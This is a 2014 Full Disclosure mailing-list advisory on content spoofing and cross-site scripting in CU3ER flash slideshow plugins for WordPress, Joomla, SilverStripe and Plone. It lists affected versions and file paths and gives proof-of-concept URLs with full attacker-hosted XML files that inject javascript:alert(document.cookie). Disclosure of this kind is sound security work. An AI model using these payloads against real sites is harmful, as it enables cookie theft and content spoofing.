Full Disclosure mailing list archives
Vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 20 Apr 2014 14:11:00 +0300
Hello list! Recently I disclosed vulnerabilities in CU3ER (http://seclists.org/fulldisclosure/2014/Apr/244). This is popular flash file and in Google's index there are up to million web sites with it (inurl:cu3er.swf filetype:swf - now Google shows 994000 results). There are any plugins for different CMS with CU3ER. These are Content Spoofing and Cross-Site Scripting vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone. Such plugins as: wpCU3ER for WordPress, jCU3ER and Vinaora Cu3er 3D Slide-show for Joomla, cu3er-silverstripe-extension for SilverStripe, collective.cu3er for Plone. ------------------------- Affected products: ------------------------- Vulnerable are all plugins with flash file of CU3ER. Vulnerable are wpCU3ER 0.75 and previous versions. Vulnerable are jCU3ER 0.12 and previous versions. Vulnerable are Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1 and previous versions. Vulnerable are all versions of cu3er-silverstripe-extension. Vulnerable are collective.cu3er 0.1 and previous versions. ------------------------- Affected vendors: ------------------------- MADEBYPLAY (wpCU3ER and jCU3ER) http://getcu3er.com Vinaora http://code.google.com/p/vinaora-3d-slideshow Matt Clegg http://www.silverstripe.org/cu3er-silverstripe-extension-module Thomas Massmann https://pypi.python.org/pypi/collective.cu3er/0.1 ---------- Details: ---------- Path to flash-file in different plugins: http://site/wp-content/uploads/wpcu3er/CU3ER.swf In old versions of the plugin: http://site/wp-content/plugins/wp-cu3er/cu3er.swf http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf http://site/components/com_cu3er/flash/CU3ER.swf http://site/media/mod_vinaora_cu3er/flash/cu3er.swf http://site/cu3er-silverstripe-extension/flash/cu3er.swf http://site/collective/cu3er/browser/flash/cu3er.swf The first two plugins use the last version of CU3ER, and three others use version 0.9.2 (and also in old versions of wp-cu3er). Content Spoofing (Content Injection) (WASC-12): http://site/cu3er.swf?xml=http://site2/1.xml File 1.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>http://websecurity.com.ua</link> </slide> </slides> </cu3er> Cross-Site Scripting (WASC-08): http://site/cu3er.swf?xml=http://site2/xss.xml File xss.xml: <?xml version="1.0" encoding="UTF-8"?> <cu3er> <slides> <slide> <url>1.jpg</url> <link>javascript:alert(document.cookie)</link> </slide> </slides> </cu3er> For cross-domain attacks it's needed to have crossdomain.xml at web site with xml-files. These are examples of CS and XSS attacks on version CU3ER 0.9.2. For the last version 1.24 it's needed different xml-files and different parameter is set to flash-file. Content Spoofing (WASC-12): http://site/cu3er.swf?xml_location=http://site2/1.xml File 1.xml: <data> <project_settings> <width>800</width> <height>600</height> </project_settings> <settings> <folder_images>/</folder_images> <start_slide>1</start_slide> <auto_play>true</auto_play> <randomize_slides>false</randomize_slides> <pause_on_rollover>true</pause_on_rollover> </settings> <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0"> </preloader> <controls> <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20"> <auto_hide time="3">false</auto_hide> <hide_on_transition>true</hide_on_transition> <background round_corners="15,0,0,15"> <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/> <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/> <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/> </background> <symbol type="2" align_pos="MC" x="0" y="0"> <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/> <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/> <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/> </symbol> </prev_button> <next_button align_pos="BR" width="30" height="30" x="-20" y="-20"> <auto_hide time="3">false</auto_hide> <hide_on_transition>true</hide_on_transition> <background round_corners="0,15,15,0"> <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/> <tweenOver tint="0xffffff" alpha="0.9"/> <tweenHide tint="0xffffff" alpha="0"/> </background> <symbol type="2" align_pos="MC" x="0" y="0"> <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/> <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/> <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/> </symbol> </next_button> </controls> <defaults> <slide time="5" color="0x000000"> <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/> <link>http://websecurity.com.ua</link> </slide> </defaults> <slides> <slide> <url><![CDATA[1.jpg]]></url> </slide> <transition rows="3" columns="5"/> <slide> <url><![CDATA[1.jpg]]></url> </slide> </slides> </data> Cross-Site Scripting (WASC-08): http://site/cu3er.swf?xml_location=http://site2/xss.xml File xss.xml: <data> <project_settings> <width>800</width> <height>600</height> </project_settings> <settings> <folder_images>/</folder_images> <start_slide>1</start_slide> <auto_play>true</auto_play> <randomize_slides>false</randomize_slides> <pause_on_rollover>true</pause_on_rollover> </settings> <preloader type="linear" align_pos="MC" width="200" height="20" x="0" y="0"> </preloader> <controls> <prev_button align_pos="BR" width="30" height="30" x="-51" y="-20"> <auto_hide time="3">false</auto_hide> <hide_on_transition>true</hide_on_transition> <background round_corners="15,0,0,15"> <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0" scaleX="1" scaleY="1"/> <tweenOver tint="0xffffff" alpha="0.9" x="0" y="0" scaleX="1" scaleY="1"/> <tweenHide tint="0xffffff" alpha="0" x="0" y="0" scaleX="1" scaleY="1"/> </background> <symbol type="2" align_pos="MC" x="0" y="0"> <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/> <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/> <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/> </symbol> </prev_button> <next_button align_pos="BR" width="30" height="30" x="-20" y="-20"> <auto_hide time="3">false</auto_hide> <hide_on_transition>true</hide_on_transition> <background round_corners="0,15,15,0"> <tweenShow tint="0xffffff" alpha="0.2" x="0" y="0"/> <tweenOver tint="0xffffff" alpha="0.9"/> <tweenHide tint="0xffffff" alpha="0"/> </background> <symbol type="2" align_pos="MC" x="0" y="0"> <tweenShow alpha="1" scaleX="0.3" scaleY="0.3" tint="0x2185c5"/> <tweenOver tint="0x2185c5" scaleX="0.4" scaleY="0.4" alpha="1" x="0" y="0"/> <tweenHide tint="0x2185c5" scaleX="0.2" scaleY="0.2" alpha="0" x="0" y="0"/> </symbol> </next_button> </controls> <defaults> <slide time="5" color="0x000000"> <image align_pos="MC" x="0" y="0" scaleX="1" scaleY="1"/> <link>javascript:alert(document.cookie)</link> </slide> </defaults> <slides> <slide> <url><![CDATA[1.jpg]]></url> </slide> <transition rows="3" columns="5"/> <slide> <url><![CDATA[1.jpg]]></url> </slide> </slides> </data> ------------ Timeline:------------
2013.11.22 - announced at my site about CU3ER. 2013.11.26 - informed developer. 2013.11.26 - announced at my site about plugins. Later informed developers of the plugins. 2014.04.18 - disclosed at my site (http://websecurity.com.ua/6893/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Vulnerabilities in plugins with CU3ER for WordPress, Joomla, SilverStripe and Plone MustLive (Apr 20)